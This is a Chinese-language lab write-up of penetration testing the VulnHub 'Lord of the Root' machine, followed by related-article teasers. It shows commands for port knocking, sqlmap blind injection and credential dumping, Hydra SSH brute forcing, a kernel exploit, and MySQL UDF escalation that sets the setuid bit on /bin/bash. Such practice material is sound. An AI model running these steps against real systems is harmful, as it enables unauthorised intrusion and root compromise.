从敲门到提权:手把手复现VulnHub Lord of the Root靶机(含SQL盲注与内核漏洞利用)

code4f

实战复现:Lord of the Root靶机渗透全流程解析

在网络安全领域,靶机渗透练习是提升实战能力的重要途径。VulnHub平台上的Lord of the Root靶机以其精巧的设计和适中的难度,成为许多安全爱好者磨练技能的理想选择。本文将带你从零开始,完整复现这个靶机的渗透过程,重点解析端口敲门、SQL盲注和提权等关键技术点。

1. 环境准备与信息收集

渗透测试的第一步永远是信息收集。我们需要先确定靶机的IP地址和开放端口。使用Kali Linux自带的nmap工具进行扫描:

bash复制nmap -sS -T4 192.168.1.0/24

扫描结果显示靶机仅开放了22端口(SSH)。尝试连接SSH服务时,我们得到了一个关键提示:"knock friend to enter"和"Easy as 1,2,3"。这明显指向了端口敲门(Port Knocking)技术。

端口敲门是一种安全机制,通过按特定顺序"敲击"关闭的端口,才能打开真正的服务端口。在本例中,我们需要依次连接1、2、3端口:

bash复制for port in 1 2 3; do nc -zv 192.168.1.100 $port; done

执行后再次扫描,会发现1337端口已经开放。这个端口运行着一个Web服务,但表面上看只有一张图片。查看页面源代码,我们发现了一段Base64编码的字符串,经过两次解码后得到了一个隐藏路径:/978345210/index.php。

2. SQL盲注实战技巧

访问发现的登录页面后,常规的SQL注入尝试(如admin/admin或万能密码)都失败了。这时我们需要使用更高级的基于时间的盲注技术。sqlmap工具可以自动化这个过程:

bash复制sqlmap -u 'http://192.168.1.100:1337/978345210/index.php' --forms --batch --dbs

关键参数说明:

  • --forms:自动检测和处理页面中的表单
  • --batch:使用默认选项,无需人工交互
  • --dbs:枚举数据库

扫描结果显示password字段存在基于时间的盲注漏洞。我们继续枚举数据库内容:

bash复制sqlmap -u 'http://192.168.1.100:1337/978345210/index.php' --forms -D Webapp -T Users --dump

成功获取了5组凭据,其中最有用的是smeagol/MyPreciousR00t。使用这些凭据通过Hydra爆破SSH服务:

bash复制hydra -l smeagol -P passwords.txt ssh://192.168.1.100

成功登录后,我们获得了smeagol用户的shell权限。

3. 提权路径分析与实践

获得初始立足点后,我们需要提升到root权限。这个靶机提供了两种提权路径:

3.1 内核漏洞提权(CVE-2015-1328)

首先检查系统信息:

bash复制uname -a
cat /etc/issue

结果显示系统运行的是Linux 3.19.0内核,Ubuntu 14.04.1。这个版本存在著名的overlayfs提权漏洞(CVE-2015-1328)。我们可以使用SearchSploit查找可用exp:

bash复制searchsploit linux 3.19.0

找到合适的exp后,将其上传到靶机并编译执行:

bash复制gcc -o exploit exploit.c
chmod +x exploit
./exploit

执行成功后,我们就获得了root权限。

3.2 MySQL UDF提权

另一种提权方式是利用MySQL服务。首先确认MySQL的运行权限:

bash复制ps -aux | grep mysql

发现MySQL是以root身份运行的。通过之前发现的数据库凭据登录MySQL:

bash复制mysql -u root -p

检查secure_file_priv设置:

sql复制SHOW VARIABLES LIKE 'secure_file_priv';

如果值为空,说明可以执行文件操作。接着我们需要上传UDF库文件并创建自定义函数:

sql复制SELECT 0x7F454C... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'udf.so';

创建成功后,就可以通过MySQL执行系统命令:

sql复制SELECT sys_exec('chmod +s /bin/bash');

这种方法同样可以获得root权限。

4. 渗透过程中的实用技巧

在实际操作中,有几个关键点需要注意:

  1. 端口敲门的实现:不同系统可能使用不同的敲门工具,常见的有knockd。了解其配置文件格式很有帮助:

    code复制[options]
        logfile = /var/log/knockd.log
    
    [openSSH]
        sequence = 1,2,3
        seq_timeout = 5
        command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    
  2. SQL盲注优化:当网络延迟较高时,可以调整sqlmap的时间相关参数:

    bash复制sqlmap --time-sec=2 --threads=5
    
  3. 提权路径选择:内核提权通常更直接,但可能引起系统崩溃;MySQL提权更隐蔽,但需要满足特定条件。

靶机渗透的价值不仅在于获取flag,更在于理解每个技术环节的原理和实现方式。Lord of the Root靶机巧妙地融合了多种常见漏洞,是练习综合渗透能力的绝佳材料。在实际操作中,记录每个步骤和遇到的错误,对于积累经验至关重要。

内容推荐

不止于Synergy:Windows 11/10自带功能+SMB3实现更安全的双机文件共享与键鼠控制方案
本文详细介绍了如何利用Windows 11/10自带功能与SMB3协议实现安全的双机文件共享和键鼠控制,无需依赖第三方工具如Synergy。通过原生键鼠共享方案和SMB 3.0文件共享,用户可以在办公环境中实现高效、安全的跨设备协作,同时降低安全风险和维护成本。
QGC参数表实战指南:从电池校准到飞行安全的关键配置
本文详细解析QGC参数表在无人机调试中的关键作用,涵盖电池校准、飞行安全配置等实战技巧。通过调整BAT_V_LOAD_DROP等核心参数,提升电池管理精度和飞行稳定性,适用于农业植保、航拍等多种场景。掌握这些参数配置方法,可显著提高无人机作业安全性和效率。
绕过fakebook的SQL注入过滤:union//select与load_file读文件的几种骚操作
本文深入探讨了在CTF比赛中绕过fakebook的SQL注入过滤的进阶技巧,重点介绍了使用union//select和load_file函数读取文件的方法。通过分析过滤机制、测试回显位置和利用特殊语法,帮助参赛者有效突破防御,获取关键信息。文章还提供了自动化脚本和序列化对象读取文件的实用技巧,适合中高级CTF选手提升实战能力。
Markdown 图片布局与尺寸控制的进阶实践
本文深入探讨了Markdown图片布局与尺寸控制的进阶实践,涵盖了基础语法差异、跨平台兼容的HTML方案、响应式图片设计以及高级应用场景。通过具体代码示例和实用技巧,帮助开发者在不同平台实现精准的图片控制,提升文档和博客的专业性与可读性。
RK3588项目实战:手把手教你搞定AIC8800无线驱动的Buildroot集成与调试
本文详细介绍了在RK3588平台上集成AIC8800无线驱动的全流程,包括硬件准备、Buildroot系统配置、驱动加载调试及性能优化。通过实战案例和代码示例,帮助开发者高效完成无线驱动移植,解决常见问题,提升系统稳定性。
SAP财务凭证实战:如何用Coding Block添加自定义字段(附ABAP代码)
本文详细介绍了如何在SAP财务凭证中使用Coding Block添加自定义字段,包括技术架构理解、字段创建与配置、屏幕逻辑控制、BADI增强实现业务逻辑等实战内容。通过ABAP代码示例和常见问题排查指南,帮助开发者高效实现财务会计凭证的客户化字段扩展,满足复杂业务需求。
uniapp中高效提取视频首帧的两种实战方案
本文详细介绍了在uniapp中高效提取视频首帧的两种实战方案:利用OSS云服务直接截取和通过RenderJS结合Canvas动态绘制。OSS方案简单高效,适合H5和App端,而RenderJS方案则更适合处理特殊视频格式。文章还对比了两种方案的兼容性、性能与成本,并提供了特殊场景处理技巧和最佳实践建议,帮助开发者快速实现视频封面提取功能。
<实战解析>H264/H265码流NALU单元结构详解与MP4封装实战(附完整C语言源码)
本文详细解析了H264/H265码流的NALU单元结构,包括帧类型、头信息解析及MP4封装实战。通过C语言源码示例,帮助开发者深入理解视频编码原理,掌握从码流解析到MP4封装的全流程技术要点,提升视频处理能力。
CH376实战笔记:从SPI驱动到U盘文件系统的嵌入式集成
本文详细介绍了CH376芯片在嵌入式系统中的实战应用,从SPI驱动到U盘文件系统的集成。通过硬件连接、软件SPI驱动实现、固件移植及文件系统操作等步骤,帮助开发者快速掌握CH376在数据读写中的高效应用,特别适合资源受限的MCU项目。
51单片机OLED显示进阶:自己动手做个小菜单和动画效果
本文详细介绍了如何在51单片机上实现OLED显示的高级功能,包括多级菜单系统的架构设计、帧动画原理与实现技巧,以及图形绘制优化方法。通过具体的代码示例和实战案例,帮助开发者打造炫酷的菜单导航和生动的动画效果,提升嵌入式系统的用户界面体验。
如何精准测试海外服务器在全球各地的访问性能?
本文详细介绍了如何精准测试海外服务器在全球各地的访问性能,包括延迟、带宽和路由质量等关键指标。通过使用Ping、Traceroute、Speedtest和iperf3等工具,结合全球节点模拟测试,帮助用户发现并解决跨境网络瓶颈问题,提升海外服务器的访问速度。
你的FPGA数字钟只能亮灯报时?试试用蜂鸣器模块实现整点‘滴滴’声(基于Quartus II)
本文详细介绍了如何利用FPGA驱动蜂鸣器模块为数字钟添加整点报时音效,从硬件连接到PWM音调生成的完整实现过程。通过Quartus II开发环境,开发者可以轻松将单调的LED报时升级为可编程的'滴滴'声,提升交互体验。文章包含硬件选型、电路设计、Verilog代码实现及调试技巧,是FPGA数字钟课程设计的实用进阶指南。
Windows 10下用YOLOv3+Deep_Sort_Pytorch实现多目标跟踪的完整配置指南(含CUDA版本避坑)
本文详细介绍了在Windows 10系统下配置YOLOv3与Deep_Sort_Pytorch实现多目标跟踪的完整流程,重点解决了CUDA版本选择、依赖安装及Windows特有编译问题。通过实战演示和性能优化技巧,帮助开发者高效搭建跟踪系统,并提供了进阶应用与自定义训练方案。
git pull --rebase:如何用它打造一条清晰、线性的提交历史?
本文深入解析`git pull --rebase`的使用方法及其在维护清晰、线性提交历史中的优势。通过对比`git merge`与`git rebase`的工作机制,提供详细的操作流程和冲突解决技巧,帮助开发者优化版本控制策略。文章还探讨了rebase的适用场景与注意事项,是提升Git使用效率的实用指南。
从SteamDB免费游戏数据到个人订阅服务:一个混合爬虫策略的实战复盘
本文详细介绍了如何通过混合爬虫策略(结合Selenium和Requests)高效爬取SteamDB免费游戏数据,并构建个人订阅服务。文章分享了Cookie获取与维护、请求失败重试机制等关键技术细节,以及从脚本到服务的架构演进过程,包括数据库设计优化和定时任务实现。
Ubuntu下VSCode + OpenOCD + Cortex-Debug:一站式STM32开发环境搭建与高效调试实战
本文详细介绍了在Ubuntu系统下使用VSCode、OpenOCD和Cortex-Debug搭建STM32开发环境的完整流程。从基础工具链安装到高级调试技巧,涵盖编译、烧录和调试全流程,特别适合嵌入式开发者提升工作效率。文章还提供了Makefile和CMake配置示例,以及常见问题排查方法,帮助开发者快速构建高效的开源STM32开发环境。
YOLOv8+DeepSORT实战:如何用两个检测模型(人+物)构建银行监控多目标跟踪系统
本文详细介绍了如何利用YOLOv8和DeepSORT构建银行监控多目标跟踪系统,通过双检测模型(人+物)实现高精度跟踪。文章涵盖系统架构设计、关键技术实现、性能优化及部署实践,特别针对银行场景中的遮挡处理和跨类别ID管理提供了解决方案。
告别模拟器限制:为ARM Linux主机(如树莓派)编译Android SDK中的aapt,实现真机级开发测试
本文详细介绍了如何在ARM Linux设备(如树莓派)上编译Android SDK中的aapt工具,实现真机级开发测试。通过环境准备、源码获取、配置修改和选择性编译等步骤,帮助开发者克服传统模拟器限制,在ARM架构上搭建完整的Android开发环境。
告别手动配依赖!用自研SQL解析器为Airflow/Azkaban自动生成血缘与调度任务
本文介绍了如何通过自研SQL解析器自动生成血缘关系与调度任务,告别手动配置依赖的繁琐过程。详细解析了SQL血缘解析的技术原理、调度系统集成方法及生产环境落地实践,帮助数据工程师提升工作效率,减少配置错误。
从零到一:手撸一个让产品经理点赞的 API 文档生成器
本文详细介绍了如何从零开始开发一个自动化API文档生成器,解决传统手工维护文档的时效性差、准确性低和维护成本高等问题。通过Python生态中的FastAPI、LibCST和Jinja2等工具,实现代码到文档的智能转换,并提供了让产品经理易懂的Markdown模板。文章还包含实战搭建指南和进阶技巧,帮助开发者高效生成和维护API文档。
已经到底了哦
精选内容
热门内容
最新内容
PointNet++最远点采样优化指南:如何用PyTorch实现FPS算法提速300%(含CUDA内存管理陷阱)
本文详细解析了PointNet++中最远点采样(FPS)算法的优化策略,通过矩阵运算替代循环、并行化采样和显存管理三重优化,实现300%的速度提升。特别针对PyTorch实现中的CUDA内存管理陷阱提供了解决方案,帮助开发者在三维点云处理中显著提升效率。
51单片机点阵显示避坑指南:Proteus仿真极性测试与取模软件设置详解
本文详细解析了51单片机点阵显示中的常见问题与解决方案,包括Proteus仿真中的极性测试、取模软件设置优化以及扫描算法调试。通过实战案例和代码示例,帮助开发者避免镜像、反白等显示异常,提升点阵显示效果。特别适用于需要显示字符、数字和汉字的51单片机项目开发。
告别卡顿花屏:RK3568 Rockit硬解码与Qt界面叠加显示的完整配置流程
本文详细介绍了在RK3568平台上实现视频硬解码与Qt界面融合显示的完整配置流程。通过对比不同硬件解码方案,重点推荐Rockit框架,提供环境配置、Qt透明窗口设置及常见问题解决方案,帮助开发者高效解决卡顿花屏问题,实现流畅的视频播放与界面叠加显示。
QT——QCharts实现动态数据可视化曲线
本文详细介绍了如何使用QT的QCharts模块实现动态数据可视化曲线,特别适用于实时曲线监控场景。从环境配置、界面搭建到数据动态更新,提供了完整的实现步骤和性能优化技巧,帮助开发者快速掌握QCharts在实时数据可视化中的应用。
Kali Linux实战:用SET工具包5分钟克隆一个钓鱼网站(附谷歌浏览器登录凭证捕获演示)
本文详细介绍了如何使用Kali Linux中的SET工具包快速克隆钓鱼网站,并演示了如何捕获谷歌浏览器登录凭证。通过实战演练,读者可以了解社会工程学攻击的基本原理及防御措施,强调这些技术仅适用于合法授权的安全测试场景。
Tahoe-100M:解锁单细胞扰动图谱的AI建模新纪元
Tahoe-100M作为单细胞研究的'百科全书',通过包含1亿个细胞、1100种药物扰动和50种癌细胞系的超级数据库,重新定义了生命基本单元的研究方式。其标准化的Mosaic平台显著降低了批次效应,为AI模型提供了高质量的'终极训练场',助力背景敏感的预测模型、药物重定位和虚拟细胞构建等突破性应用。
Qt应用打包实战:从windeployqt到Enigma Virtual Box的完整指南
本文详细介绍了Qt应用程序打包的完整流程,从使用windeployqt收集依赖到使用Enigma Virtual Box封装成单文件。通过实战经验和常见问题解决方案,帮助开发者高效完成Qt应用打包,确保程序在不同环境中稳定运行。
(十一)LVGL定时器:从基础应用到高级调度策略
本文深入探讨LVGL定时器在嵌入式GUI开发中的应用,从基础概念到高级调度策略。通过智能仪表盘实战案例,详细解析定时器的四种经典应用模式,包括动态图表刷新、多数据源轮询等,并分享性能优化与调试技巧,帮助开发者高效利用LVGL定时器提升界面流畅度。
从Counts到FPKM:利用biomaRt实现基因表达量计算与ID转换实战
本文详细介绍了如何利用biomaRt工具从RNA-seq原始计数(raw counts)转换为FPKM标准化基因表达量,并实现基因ID到gene symbol的转换。通过R语言实战演示,涵盖数据准备、基因长度获取、FPKM计算及ID转换等关键步骤,帮助研究人员准确分析基因表达数据。
别再傻傻用现金红包了!微信支付「商家转账到零钱」实战踩坑与场景选择指南
本文深入解析微信支付「商家转账到零钱」与现金红包的核心差异,帮助企业在商业场景中做出最优选择。通过真实案例揭示费率成本、风控规则等关键因素,提供五步决策框架和实战避坑指南,确保资金发放高效安全。